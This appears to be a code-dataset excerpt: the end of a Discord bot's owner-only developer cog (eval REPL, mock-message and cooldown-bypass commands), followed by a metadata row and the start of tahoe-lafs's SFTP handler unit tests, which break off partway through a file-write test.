_("Already running a REPL session in this channel. Exit it with `quit`.")
)
else:
await ctx.send(
_(
"Already running a REPL session in this channel. Resume the REPL with `{}repl resume`."
).format(ctx.prefix)
)
return
env = self.get_environment(ctx)
env["__builtins__"] = __builtins__
env["_"] = None
self.sessions[ctx.channel.id] = True
await ctx.send(
_(
"Enter code to execute or evaluate. `exit()` or `quit` to exit. `{}repl pause` to pause."
).format(ctx.prefix)
)
while True:
response = await ctx.bot.wait_for("message", check=MessagePredicate.regex(r"^`", ctx))
if not self.sessions[ctx.channel.id]:
continue
cleaned = self.cleanup_code(response.content)
if cleaned in ("quit", "exit", "exit()"):
await ctx.send(_("Exiting."))
del self.sessions[ctx.channel.id]
return
executor = None
if cleaned.count("\n") == 0:
# single statement, potentially 'eval'
try:
code = self.async_compile(cleaned, "<repl session>", "eval")
except SyntaxError:
pass
else:
executor = eval
if executor is None:
try:
code = self.async_compile(cleaned, "<repl session>", "exec")
except SyntaxError as e:
await ctx.send_interactive(self.get_syntax_error(e), box_lang="py")
continue
env["message"] = response
stdout = io.StringIO()
msg = ""
try:
with redirect_stdout(stdout):
if executor is None:
result = types.FunctionType(code, env)()
else:
result = executor(code, env)
result = await self.maybe_await(result)
except:
value = stdout.getvalue()
msg = "{}{}".format(value, traceback.format_exc())
else:
value = stdout.getvalue()
if result is not None:
msg = "{}{}".format(value, result)
env["_"] = result
elif value:
msg = "{}".format(value)
msg = self.sanitize_output(ctx, msg)
try:
await ctx.send_interactive(self.get_pages(msg), box_lang="py")
except discord.Forbidden:
pass
except discord.HTTPException as e:
await ctx.send(_("Unexpected error: `{}`").format(e))
@repl.command(aliases=["resume"])
async def pause(self, ctx, toggle: Optional[bool] = None):
"""Pauses/resumes the REPL running in the current channel"""
if ctx.channel.id not in self.sessions:
await ctx.send(_("There is no currently running REPL session in this channel."))
return
if toggle is None:
toggle = not self.sessions[ctx.channel.id]
self.sessions[ctx.channel.id] = toggle
if toggle:
await ctx.send(_("The REPL session in this channel has been resumed."))
else:
await ctx.send(_("The REPL session in this channel is now paused."))
@commands.command()
@checks.is_owner()
async def mock(self, ctx, user: discord.Member, *, command):
"""Mock another user invoking a command.
The prefix must not be entered.
"""
msg = copy(ctx.message)
msg.author = user
msg.content = ctx.prefix + command
ctx.bot.dispatch("message", msg)
@commands.command(name="mockmsg")
@checks.is_owner()
async def mock_msg(self, ctx, user: discord.Member, *, content: str):
"""Dispatch a message event as if it were sent by a different user.
Only reads the raw content of the message. Attachments, embeds etc. are
ignored.
"""
old_author = ctx.author
old_content = ctx.message.content
ctx.message.author = user
ctx.message.content = content
ctx.bot.dispatch("message", ctx.message)
# If we change the author and content back too quickly,
# the bot won't process the mocked message in time.
await asyncio.sleep(2)
ctx.message.author = old_author
ctx.message.content = old_content
@commands.command()
@checks.is_owner()
async def bypasscooldowns(self, ctx, toggle: Optional[bool] = None):
"""Give bot owners the ability to bypass cooldowns.
Does not persist through restarts."""
if toggle is None:
toggle = not ctx.bot._bypass_cooldowns
ctx.bot._bypass_cooldowns = toggle
if toggle:
await ctx.send(_("Bot owners will now bypass all commands with cooldowns."))
else:
await ctx.send(_("Bot owners will no longer bypass all commands with cooldowns."))
| gpl-3.0 | -4,217,651,589,190,516,700 | 33.034759 | 111 | 0.553932 | false |
gsb-eng/tahoe-lafs | src/allmydata/test/test_sftp.py | 7 | 80359 |
import re, struct, traceback, time, calendar
from stat import S_IFREG, S_IFDIR
from twisted.trial import unittest
from twisted.internet import defer, reactor
from twisted.python.failure import Failure
from twisted.internet.error import ProcessDone, ProcessTerminated
from allmydata.util import deferredutil
conch_interfaces = None
sftp = None
sftpd = None
have_pycrypto = False
try:
from Crypto import Util
Util # hush pyflakes
have_pycrypto = True
except ImportError:
pass
if have_pycrypto:
from twisted.conch import interfaces as conch_interfaces
from twisted.conch.ssh import filetransfer as sftp
from allmydata.frontends import sftpd
from allmydata.interfaces import IDirectoryNode, ExistingChildError, NoSuchChildError
from allmydata.mutable.common import NotWriteableError
from allmydata.util.consumer import download_to_data
from allmydata.immutable import upload
from allmydata.mutable import publish
from allmydata.test.no_network import GridTestMixin
from allmydata.test.common import ShouldFailMixin
from allmydata.test.common_util import ReallyEqualMixin
timeout = 240
class Handler(GridTestMixin, ShouldFailMixin, ReallyEqualMixin, unittest.TestCase):
"""This is a no-network unit test of the SFTPUserHandler and the abstractions it uses."""
if not have_pycrypto:
skip = "SFTP support requires pycrypto, which is not installed"
def shouldFailWithSFTPError(self, expected_code, which, callable, *args, **kwargs):
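        # Added for clarity (not in the original): asserts that
        # callable(*args, **kwargs) fails with an SFTPError whose code is
        # expected_code; used throughout the tests below.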
assert isinstance(expected_code, int), repr(expected_code)
assert isinstance(which, str), repr(which)
s = traceback.format_stack()
d = defer.maybeDeferred(callable, *args, **kwargs)
def _done(res):
if isinstance(res, Failure):
res.trap(sftp.SFTPError)
self.failUnlessReallyEqual(res.value.code, expected_code,
"%s was supposed to raise SFTPError(%r), not SFTPError(%r): %s" %
(which, expected_code, res.value.code, res))
else:
print '@' + '@'.join(s)
self.fail("%s was supposed to raise SFTPError(%r), not get %r" %
(which, expected_code, res))
d.addBoth(_done)
return d
def _set_up(self, basedir, num_clients=1, num_servers=10):
self.basedir = "sftp/" + basedir
self.set_up_grid(num_clients=num_clients, num_servers=num_servers)
self.client = self.g.clients[0]
self.username = "alice"
d = self.client.create_dirnode()
def _created_root(node):
self.root = node
self.root_uri = node.get_uri()
sftpd._reload()
self.handler = sftpd.SFTPUserHandler(self.client, self.root, self.username)
d.addCallback(_created_root)
return d
def _set_up_tree(self):
u = publish.MutableData("mutable file contents")
d = self.client.create_mutable_file(u)
d.addCallback(lambda node: self.root.set_node(u"mutable", node))
def _created_mutable(n):
self.mutable = n
self.mutable_uri = n.get_uri()
d.addCallback(_created_mutable)
d.addCallback(lambda ign:
self.root._create_and_validate_node(None, self.mutable.get_readonly_uri(), name=u"readonly"))
d.addCallback(lambda node: self.root.set_node(u"readonly", node))
def _created_readonly(n):
self.readonly = n
self.readonly_uri = n.get_uri()
d.addCallback(_created_readonly)
gross = upload.Data("0123456789" * 101, None)
d.addCallback(lambda ign: self.root.add_file(u"gro\u00DF", gross))
def _created_gross(n):
self.gross = n
self.gross_uri = n.get_uri()
d.addCallback(_created_gross)
small = upload.Data("0123456789", None)
d.addCallback(lambda ign: self.root.add_file(u"small", small))
def _created_small(n):
self.small = n
self.small_uri = n.get_uri()
d.addCallback(_created_small)
small2 = upload.Data("Small enough for a LIT too", None)
d.addCallback(lambda ign: self.root.add_file(u"small2", small2))
def _created_small2(n):
self.small2 = n
self.small2_uri = n.get_uri()
d.addCallback(_created_small2)
empty_litdir_uri = "URI:DIR2-LIT:"
# contains one child which is itself also LIT:
tiny_litdir_uri = "URI:DIR2-LIT:gqytunj2onug64tufqzdcosvkjetutcjkq5gw4tvm5vwszdgnz5hgyzufqydulbshj5x2lbm"
unknown_uri = "x-tahoe-crazy://I_am_from_the_future."
d.addCallback(lambda ign: self.root._create_and_validate_node(None, empty_litdir_uri, name=u"empty_lit_dir"))
def _created_empty_lit_dir(n):
self.empty_lit_dir = n
self.empty_lit_dir_uri = n.get_uri()
self.root.set_node(u"empty_lit_dir", n)
d.addCallback(_created_empty_lit_dir)
d.addCallback(lambda ign: self.root._create_and_validate_node(None, tiny_litdir_uri, name=u"tiny_lit_dir"))
def _created_tiny_lit_dir(n):
self.tiny_lit_dir = n
self.tiny_lit_dir_uri = n.get_uri()
self.root.set_node(u"tiny_lit_dir", n)
d.addCallback(_created_tiny_lit_dir)
d.addCallback(lambda ign: self.root._create_and_validate_node(None, unknown_uri, name=u"unknown"))
def _created_unknown(n):
self.unknown = n
self.unknown_uri = n.get_uri()
self.root.set_node(u"unknown", n)
d.addCallback(_created_unknown)
fall_of_the_Berlin_wall = calendar.timegm(time.strptime("1989-11-09 20:00:00 UTC", "%Y-%m-%d %H:%M:%S %Z"))
md = {'mtime': fall_of_the_Berlin_wall, 'tahoe': {'linkmotime': fall_of_the_Berlin_wall}}
d.addCallback(lambda ign: self.root.set_node(u"loop", self.root, metadata=md))
return d
def test_basic(self):
d = self._set_up("basic")
def _check(ign):
# Test operations that have no side-effects, and don't need the tree.
version = self.handler.gotVersion(3, {})
self.failUnless(isinstance(version, dict))
self.failUnlessReallyEqual(self.handler._path_from_string(""), [])
self.failUnlessReallyEqual(self.handler._path_from_string("/"), [])
self.failUnlessReallyEqual(self.handler._path_from_string("."), [])
self.failUnlessReallyEqual(self.handler._path_from_string("//"), [])
self.failUnlessReallyEqual(self.handler._path_from_string("/."), [])
self.failUnlessReallyEqual(self.handler._path_from_string("/./"), [])
self.failUnlessReallyEqual(self.handler._path_from_string("foo"), [u"foo"])
self.failUnlessReallyEqual(self.handler._path_from_string("/foo"), [u"foo"])
self.failUnlessReallyEqual(self.handler._path_from_string("foo/"), [u"foo"])
self.failUnlessReallyEqual(self.handler._path_from_string("/foo/"), [u"foo"])
self.failUnlessReallyEqual(self.handler._path_from_string("foo/bar"), [u"foo", u"bar"])
self.failUnlessReallyEqual(self.handler._path_from_string("/foo/bar"), [u"foo", u"bar"])
self.failUnlessReallyEqual(self.handler._path_from_string("foo/bar//"), [u"foo", u"bar"])
self.failUnlessReallyEqual(self.handler._path_from_string("/foo/bar//"), [u"foo", u"bar"])
self.failUnlessReallyEqual(self.handler._path_from_string("foo/./bar"), [u"foo", u"bar"])
self.failUnlessReallyEqual(self.handler._path_from_string("./foo/./bar"), [u"foo", u"bar"])
self.failUnlessReallyEqual(self.handler._path_from_string("foo/../bar"), [u"bar"])
self.failUnlessReallyEqual(self.handler._path_from_string("/foo/../bar"), [u"bar"])
self.failUnlessReallyEqual(self.handler._path_from_string("../bar"), [u"bar"])
self.failUnlessReallyEqual(self.handler._path_from_string("/../bar"), [u"bar"])
self.failUnlessReallyEqual(self.handler.realPath(""), "/")
self.failUnlessReallyEqual(self.handler.realPath("/"), "/")
self.failUnlessReallyEqual(self.handler.realPath("."), "/")
self.failUnlessReallyEqual(self.handler.realPath("//"), "/")
self.failUnlessReallyEqual(self.handler.realPath("/."), "/")
self.failUnlessReallyEqual(self.handler.realPath("/./"), "/")
self.failUnlessReallyEqual(self.handler.realPath("foo"), "/foo")
self.failUnlessReallyEqual(self.handler.realPath("/foo"), "/foo")
self.failUnlessReallyEqual(self.handler.realPath("foo/"), "/foo")
self.failUnlessReallyEqual(self.handler.realPath("/foo/"), "/foo")
self.failUnlessReallyEqual(self.handler.realPath("foo/bar"), "/foo/bar")
self.failUnlessReallyEqual(self.handler.realPath("/foo/bar"), "/foo/bar")
self.failUnlessReallyEqual(self.handler.realPath("foo/bar//"), "/foo/bar")
self.failUnlessReallyEqual(self.handler.realPath("/foo/bar//"), "/foo/bar")
self.failUnlessReallyEqual(self.handler.realPath("foo/./bar"), "/foo/bar")
self.failUnlessReallyEqual(self.handler.realPath("./foo/./bar"), "/foo/bar")
self.failUnlessReallyEqual(self.handler.realPath("foo/../bar"), "/bar")
self.failUnlessReallyEqual(self.handler.realPath("/foo/../bar"), "/bar")
self.failUnlessReallyEqual(self.handler.realPath("../bar"), "/bar")
self.failUnlessReallyEqual(self.handler.realPath("/../bar"), "/bar")
d.addCallback(_check)
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "_path_from_string invalid UTF-8",
self.handler._path_from_string, "\xFF"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "realPath invalid UTF-8",
self.handler.realPath, "\xFF"))
return d
def test_convert_error(self):
self.failUnlessReallyEqual(sftpd._convert_error(None, "request"), None)
d = defer.succeed(None)
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_FAILURE, "_convert_error SFTPError",
sftpd._convert_error, Failure(sftp.SFTPError(sftp.FX_FAILURE, "foo")), "request"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "_convert_error NoSuchChildError",
sftpd._convert_error, Failure(NoSuchChildError("foo")), "request"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_FAILURE, "_convert_error ExistingChildError",
sftpd._convert_error, Failure(ExistingChildError("foo")), "request"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "_convert_error NotWriteableError",
sftpd._convert_error, Failure(NotWriteableError("foo")), "request"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_OP_UNSUPPORTED, "_convert_error NotImplementedError",
sftpd._convert_error, Failure(NotImplementedError("foo")), "request"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_EOF, "_convert_error EOFError",
sftpd._convert_error, Failure(EOFError("foo")), "request"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_EOF, "_convert_error defer.FirstError",
sftpd._convert_error, Failure(defer.FirstError(
Failure(sftp.SFTPError(sftp.FX_EOF, "foo")), 0)), "request"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_FAILURE, "_convert_error AssertionError",
sftpd._convert_error, Failure(AssertionError("foo")), "request"))
return d
def test_not_implemented(self):
d = self._set_up("not_implemented")
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_OP_UNSUPPORTED, "readLink link",
self.handler.readLink, "link"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_OP_UNSUPPORTED, "makeLink link file",
self.handler.makeLink, "link", "file"))
return d
def _compareDirLists(self, actual, expected):
actual_list = sorted(actual)
expected_list = sorted(expected)
self.failUnlessReallyEqual(len(actual_list), len(expected_list),
"%r is wrong length, expecting %r" % (actual_list, expected_list))
for (a, b) in zip(actual_list, expected_list):
(name, text, attrs) = a
(expected_name, expected_text_re, expected_attrs) = b
self.failUnlessReallyEqual(name, expected_name)
self.failUnless(re.match(expected_text_re, text),
"%r does not match %r in\n%r" % (text, expected_text_re, actual_list))
self._compareAttributes(attrs, expected_attrs)
def _compareAttributes(self, attrs, expected_attrs):
# It is ok for there to be extra actual attributes.
# TODO: check times
for e in expected_attrs:
self.failUnless(e in attrs, "%r is not in\n%r" % (e, attrs))
self.failUnlessReallyEqual(attrs[e], expected_attrs[e],
"%r:%r is not %r in\n%r" % (e, attrs[e], expected_attrs[e], attrs))
def test_openDirectory_and_attrs(self):
d = self._set_up("openDirectory_and_attrs")
d.addCallback(lambda ign: self._set_up_tree())
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openDirectory small",
self.handler.openDirectory, "small"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openDirectory unknown",
self.handler.openDirectory, "unknown"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "openDirectory nodir",
self.handler.openDirectory, "nodir"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "openDirectory nodir/nodir",
self.handler.openDirectory, "nodir/nodir"))
gross = u"gro\u00DF".encode("utf-8")
expected_root = [
('empty_lit_dir', r'dr-xr-xr-x .* 0 .* empty_lit_dir$', {'permissions': S_IFDIR | 0555}),
(gross, r'-rw-rw-rw- .* 1010 .* '+gross+'$', {'permissions': S_IFREG | 0666, 'size': 1010}),
# The fall of the Berlin wall may have been on 9th or 10th November 1989 depending on the gateway's timezone.
#('loop', r'drwxrwxrwx .* 0 Nov (09|10) 1989 loop$', {'permissions': S_IFDIR | 0777}),
('loop', r'drwxrwxrwx .* 0 .* loop$', {'permissions': S_IFDIR | 0777}),
('mutable', r'-rw-rw-rw- .* 0 .* mutable$', {'permissions': S_IFREG | 0666}),
('readonly', r'-r--r--r-- .* 0 .* readonly$', {'permissions': S_IFREG | 0444}),
('small', r'-rw-rw-rw- .* 10 .* small$', {'permissions': S_IFREG | 0666, 'size': 10}),
('small2', r'-rw-rw-rw- .* 26 .* small2$', {'permissions': S_IFREG | 0666, 'size': 26}),
('tiny_lit_dir', r'dr-xr-xr-x .* 0 .* tiny_lit_dir$', {'permissions': S_IFDIR | 0555}),
('unknown', r'\?--------- .* 0 .* unknown$', {'permissions': 0}),
]
d.addCallback(lambda ign: self.handler.openDirectory(""))
d.addCallback(lambda res: self._compareDirLists(res, expected_root))
d.addCallback(lambda ign: self.handler.openDirectory("loop"))
d.addCallback(lambda res: self._compareDirLists(res, expected_root))
d.addCallback(lambda ign: self.handler.openDirectory("loop/loop"))
d.addCallback(lambda res: self._compareDirLists(res, expected_root))
d.addCallback(lambda ign: self.handler.openDirectory("empty_lit_dir"))
d.addCallback(lambda res: self._compareDirLists(res, []))
# The UTC epoch may either be in Jan 1 1970 or Dec 31 1969 depending on the gateway's timezone.
expected_tiny_lit = [
('short', r'-r--r--r-- .* 8 (Jan 01 1970|Dec 31 1969) short$', {'permissions': S_IFREG | 0444, 'size': 8}),
]
d.addCallback(lambda ign: self.handler.openDirectory("tiny_lit_dir"))
d.addCallback(lambda res: self._compareDirLists(res, expected_tiny_lit))
d.addCallback(lambda ign: self.handler.getAttrs("small", True))
d.addCallback(lambda attrs: self._compareAttributes(attrs, {'permissions': S_IFREG | 0666, 'size': 10}))
d.addCallback(lambda ign: self.handler.setAttrs("small", {}))
d.addCallback(lambda res: self.failUnlessReallyEqual(res, None))
d.addCallback(lambda ign: self.handler.getAttrs("small", True))
d.addCallback(lambda attrs: self._compareAttributes(attrs, {'permissions': S_IFREG | 0666, 'size': 10}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_OP_UNSUPPORTED, "setAttrs size",
self.handler.setAttrs, "small", {'size': 0}))
d.addCallback(lambda ign: self.failUnlessEqual(sftpd.all_heisenfiles, {}))
d.addCallback(lambda ign: self.failUnlessEqual(self.handler._heisenfiles, {}))
return d
def test_openFile_read(self):
d = self._set_up("openFile_read")
d.addCallback(lambda ign: self._set_up_tree())
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_BAD_MESSAGE, "openFile small 0 bad",
self.handler.openFile, "small", 0, {}))
# attempting to open a non-existent file should fail
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "openFile nofile READ nosuch",
self.handler.openFile, "nofile", sftp.FXF_READ, {}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "openFile nodir/file READ nosuch",
self.handler.openFile, "nodir/file", sftp.FXF_READ, {}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile unknown READ denied",
self.handler.openFile, "unknown", sftp.FXF_READ, {}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile unknown/file READ denied",
self.handler.openFile, "unknown/file", sftp.FXF_READ, {}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile tiny_lit_dir READ denied",
self.handler.openFile, "tiny_lit_dir", sftp.FXF_READ, {}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile unknown uri READ denied",
self.handler.openFile, "uri/"+self.unknown_uri, sftp.FXF_READ, {}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile tiny_lit_dir uri READ denied",
self.handler.openFile, "uri/"+self.tiny_lit_dir_uri, sftp.FXF_READ, {}))
# FIXME: should be FX_NO_SUCH_FILE?
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile noexist uri READ denied",
self.handler.openFile, "uri/URI:noexist", sftp.FXF_READ, {}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "openFile invalid UTF-8 uri READ denied",
self.handler.openFile, "uri/URI:\xFF", sftp.FXF_READ, {}))
# reading an existing file should succeed
d.addCallback(lambda ign: self.handler.openFile("small", sftp.FXF_READ, {}))
def _read_small(rf):
d2 = rf.readChunk(0, 10)
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, "0123456789"))
d2.addCallback(lambda ign: rf.readChunk(2, 6))
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, "234567"))
d2.addCallback(lambda ign: rf.readChunk(1, 0))
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, ""))
d2.addCallback(lambda ign: rf.readChunk(8, 4)) # read that starts before EOF is OK
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, "89"))
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_EOF, "readChunk starting at EOF (0-byte)",
rf.readChunk, 10, 0))
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_EOF, "readChunk starting at EOF",
rf.readChunk, 10, 1))
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_EOF, "readChunk starting after EOF",
rf.readChunk, 11, 1))
d2.addCallback(lambda ign: rf.getAttrs())
d2.addCallback(lambda attrs: self._compareAttributes(attrs, {'permissions': S_IFREG | 0666, 'size': 10}))
d2.addCallback(lambda ign: self.handler.getAttrs("small", followLinks=0))
d2.addCallback(lambda attrs: self._compareAttributes(attrs, {'permissions': S_IFREG | 0666, 'size': 10}))
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "writeChunk on read-only handle denied",
rf.writeChunk, 0, "a"))
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "setAttrs on read-only handle denied",
rf.setAttrs, {}))
d2.addCallback(lambda ign: rf.close())
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_BAD_MESSAGE, "readChunk on closed file bad",
rf.readChunk, 0, 1))
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_BAD_MESSAGE, "getAttrs on closed file bad",
rf.getAttrs))
d2.addCallback(lambda ign: rf.close()) # should be no-op
return d2
d.addCallback(_read_small)
# repeat for a large file
gross = u"gro\u00DF".encode("utf-8")
d.addCallback(lambda ign: self.handler.openFile(gross, sftp.FXF_READ, {}))
def _read_gross(rf):
d2 = rf.readChunk(0, 10)
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, "0123456789"))
d2.addCallback(lambda ign: rf.readChunk(2, 6))
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, "234567"))
d2.addCallback(lambda ign: rf.readChunk(1, 0))
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, ""))
d2.addCallback(lambda ign: rf.readChunk(1008, 4)) # read that starts before EOF is OK
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, "89"))
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_EOF, "readChunk starting at EOF (0-byte)",
rf.readChunk, 1010, 0))
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_EOF, "readChunk starting at EOF",
rf.readChunk, 1010, 1))
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_EOF, "readChunk starting after EOF",
rf.readChunk, 1011, 1))
d2.addCallback(lambda ign: rf.getAttrs())
d2.addCallback(lambda attrs: self._compareAttributes(attrs, {'permissions': S_IFREG | 0666, 'size': 1010}))
d2.addCallback(lambda ign: self.handler.getAttrs(gross, followLinks=0))
d2.addCallback(lambda attrs: self._compareAttributes(attrs, {'permissions': S_IFREG | 0666, 'size': 1010}))
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "writeChunk on read-only handle denied",
rf.writeChunk, 0, "a"))
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "setAttrs on read-only handle denied",
rf.setAttrs, {}))
d2.addCallback(lambda ign: rf.close())
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_BAD_MESSAGE, "readChunk on closed file",
rf.readChunk, 0, 1))
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_BAD_MESSAGE, "getAttrs on closed file",
rf.getAttrs))
d2.addCallback(lambda ign: rf.close()) # should be no-op
return d2
d.addCallback(_read_gross)
# reading an existing small file via uri/ should succeed
d.addCallback(lambda ign: self.handler.openFile("uri/"+self.small_uri, sftp.FXF_READ, {}))
def _read_small_uri(rf):
d2 = rf.readChunk(0, 10)
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, "0123456789"))
d2.addCallback(lambda ign: rf.close())
return d2
d.addCallback(_read_small_uri)
# repeat for a large file
d.addCallback(lambda ign: self.handler.openFile("uri/"+self.gross_uri, sftp.FXF_READ, {}))
def _read_gross_uri(rf):
d2 = rf.readChunk(0, 10)
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, "0123456789"))
d2.addCallback(lambda ign: rf.close())
return d2
d.addCallback(_read_gross_uri)
# repeat for a mutable file
d.addCallback(lambda ign: self.handler.openFile("uri/"+self.mutable_uri, sftp.FXF_READ, {}))
def _read_mutable_uri(rf):
d2 = rf.readChunk(0, 100)
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, "mutable file contents"))
d2.addCallback(lambda ign: rf.close())
return d2
d.addCallback(_read_mutable_uri)
# repeat for a file within a directory referenced by URI
d.addCallback(lambda ign: self.handler.openFile("uri/"+self.tiny_lit_dir_uri+"/short", sftp.FXF_READ, {}))
def _read_short(rf):
d2 = rf.readChunk(0, 100)
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, "The end."))
d2.addCallback(lambda ign: rf.close())
return d2
d.addCallback(_read_short)
# check that failed downloads cause failed reads. Note that this
# trashes the grid (by deleting all shares), so this must be at the
# end of the test function.
d.addCallback(lambda ign: self.handler.openFile("uri/"+self.gross_uri, sftp.FXF_READ, {}))
def _read_broken(rf):
d2 = defer.succeed(None)
d2.addCallback(lambda ign: self.g.nuke_from_orbit())
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_FAILURE, "read broken",
rf.readChunk, 0, 100))
# close shouldn't fail
d2.addCallback(lambda ign: rf.close())
d2.addCallback(lambda res: self.failUnlessReallyEqual(res, None))
return d2
d.addCallback(_read_broken)
d.addCallback(lambda ign: self.failUnlessEqual(sftpd.all_heisenfiles, {}))
d.addCallback(lambda ign: self.failUnlessEqual(self.handler._heisenfiles, {}))
return d
def test_openFile_read_error(self):
# The check at the end of openFile_read tested this for large files,
# but it trashed the grid in the process, so this needs to be a
# separate test.
small = upload.Data("0123456789"*10, None)
d = self._set_up("openFile_read_error")
d.addCallback(lambda ign: self.root.add_file(u"small", small))
d.addCallback(lambda n: self.handler.openFile("/uri/"+n.get_uri(), sftp.FXF_READ, {}))
def _read_broken(rf):
d2 = defer.succeed(None)
d2.addCallback(lambda ign: self.g.nuke_from_orbit())
d2.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_FAILURE, "read broken",
rf.readChunk, 0, 100))
# close shouldn't fail
d2.addCallback(lambda ign: rf.close())
d2.addCallback(lambda res: self.failUnlessReallyEqual(res, None))
return d2
d.addCallback(_read_broken)
d.addCallback(lambda ign: self.failUnlessEqual(sftpd.all_heisenfiles, {}))
d.addCallback(lambda ign: self.failUnlessEqual(self.handler._heisenfiles, {}))
return d
def test_openFile_write(self):
d = self._set_up("openFile_write")
d.addCallback(lambda ign: self._set_up_tree())
# '' is an invalid filename
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "openFile '' WRITE|CREAT|TRUNC nosuch",
self.handler.openFile, "", sftp.FXF_WRITE | sftp.FXF_CREAT | sftp.FXF_TRUNC, {}))
# TRUNC is not valid without CREAT if the file does not already exist
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "openFile newfile WRITE|TRUNC nosuch",
self.handler.openFile, "newfile", sftp.FXF_WRITE | sftp.FXF_TRUNC, {}))
# EXCL is not valid without CREAT
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_BAD_MESSAGE, "openFile small WRITE|EXCL bad",
self.handler.openFile, "small", sftp.FXF_WRITE | sftp.FXF_EXCL, {}))
# cannot write to an existing directory
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile tiny_lit_dir WRITE denied",
self.handler.openFile, "tiny_lit_dir", sftp.FXF_WRITE, {}))
# cannot write to an existing unknown
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile unknown WRITE denied",
self.handler.openFile, "unknown", sftp.FXF_WRITE, {}))
# cannot create a child of an unknown
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile unknown/newfile WRITE|CREAT denied",
self.handler.openFile, "unknown/newfile",
sftp.FXF_WRITE | sftp.FXF_CREAT, {}))
# cannot write to a new file in an immutable directory
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile tiny_lit_dir/newfile WRITE|CREAT|TRUNC denied",
self.handler.openFile, "tiny_lit_dir/newfile",
sftp.FXF_WRITE | sftp.FXF_CREAT | sftp.FXF_TRUNC, {}))
# cannot write to an existing immutable file in an immutable directory (with or without CREAT and EXCL)
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile tiny_lit_dir/short WRITE denied",
self.handler.openFile, "tiny_lit_dir/short", sftp.FXF_WRITE, {}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile tiny_lit_dir/short WRITE|CREAT denied",
